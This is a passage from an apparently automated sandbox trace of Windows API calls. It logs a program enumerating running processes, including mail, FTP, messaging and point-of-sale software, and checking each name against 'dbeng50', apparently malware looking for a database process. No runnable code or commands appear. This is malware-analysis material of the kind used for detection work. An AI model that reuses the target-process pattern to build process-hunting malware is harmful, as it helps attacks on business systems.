[0096.028] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35742b0 [0096.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x35742b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0096.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0096.028] StrStrIA (lpFirst="outlook.exe", lpSrch="dbeng50") returned 0x0 [0096.028] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.029] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3574328 [0096.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3574328, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0096.029] StrStrIA (lpFirst="pidgin.exe", lpSrch="dbeng50") returned 0x0 [0096.029] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.031] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576880 [0096.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576880, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0096.031] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0096.031] StrStrIA (lpFirst="scriptftp.exe", lpSrch="dbeng50") returned 0x0 [0096.031] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.032] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576970 [0096.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3576970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0096.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0096.032] StrStrIA (lpFirst="skype.exe", lpSrch="dbeng50") returned 0x0 [0096.032] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.033] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576730 [0096.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576730, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.033] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0096.033] StrStrIA (lpFirst="smartftp.exe", lpSrch="dbeng50") returned 0x0 [0096.033] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.035] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576838 [0096.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3576838, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0096.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0096.035] StrStrIA (lpFirst="thunderbird.exe", lpSrch="dbeng50") returned 0x0 [0096.035] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0096.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.036] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576760 [0096.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3576760, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0096.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0096.036] StrStrIA (lpFirst="totalcmd.exe", lpSrch="dbeng50") returned 0x0 [0096.036] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.038] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576988 [0096.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3576988, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0096.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0096.038] StrStrIA (lpFirst="trillian.exe", lpSrch="dbeng50") returned 0x0 [0096.038] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.039] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576958 [0096.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3576958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0096.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0096.039] StrStrIA (lpFirst="webdrive.exe", lpSrch="dbeng50") returned 0x0 [0096.039] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.040] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35766a0 [0096.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35766a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0096.040] StrStrIA (lpFirst="whatsapp.exe", lpSrch="dbeng50") returned 0x0 [0096.040] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.041] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576940 [0096.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3576940, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0096.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0096.041] StrStrIA (lpFirst="winscp.exe", lpSrch="dbeng50") returned 0x0 [0096.041] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.042] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575a00 [0096.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3575a00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0096.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0096.042] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="dbeng50") returned 0x0 [0096.042] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.043] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575900 [0096.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3575900, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0096.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0096.044] StrStrIA (lpFirst="active-charge.exe", lpSrch="dbeng50") returned 0x0 [0096.044] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.045] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35768b0 [0096.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35768b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0096.045] StrStrIA (lpFirst="accupos.exe", lpSrch="dbeng50") returned 0x0 [0096.045] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.046] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576790 [0096.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3576790, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0096.046] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0096.046] StrStrIA (lpFirst="afr38.exe", lpSrch="dbeng50") returned 0x0 [0096.046] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.047] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35768c8 [0096.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x35768c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0096.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0096.047] StrStrIA (lpFirst="aldelo.exe", lpSrch="dbeng50") returned 0x0 [0096.047] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0096.049] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35767f0 [0096.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35767f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0096.049] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0096.049] StrStrIA (lpFirst="ccv_server.exe", lpSrch="dbeng50") returned 0x0 [0096.049] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.050] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3575a20 [0096.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3575a20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0096.050] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0096.050] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="dbeng50") returned 0x0 [0096.050] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.051] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3575fa0 [0096.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575fa0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0096.051] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0096.051] StrStrIA (lpFirst="creditservice.exe", lpSrch="dbeng50") returned 0x0 [0096.051] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.052] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576898 [0096.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3576898, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0096.052] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0096.052] StrStrIA (lpFirst="edcsvr.exe", lpSrch="dbeng50") returned 0x0 [0096.052] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.053] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3576808 [0096.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3576808, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0096.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0096.053] StrStrIA (lpFirst="fpos.exe", lpSrch="dbeng50") returned 0x0 [0096.053] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.054] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35767a8 [0096.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35767a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0096.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0096.055] StrStrIA (lpFirst="isspos.exe", lpSrch="dbeng50") returned 0x0 [0096.055] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.056] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575e60 [0096.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3575e60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0096.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0096.056] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="dbeng50") returned 0x0 [0096.056] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.057] LocalAlloc (uFlags=0x40, 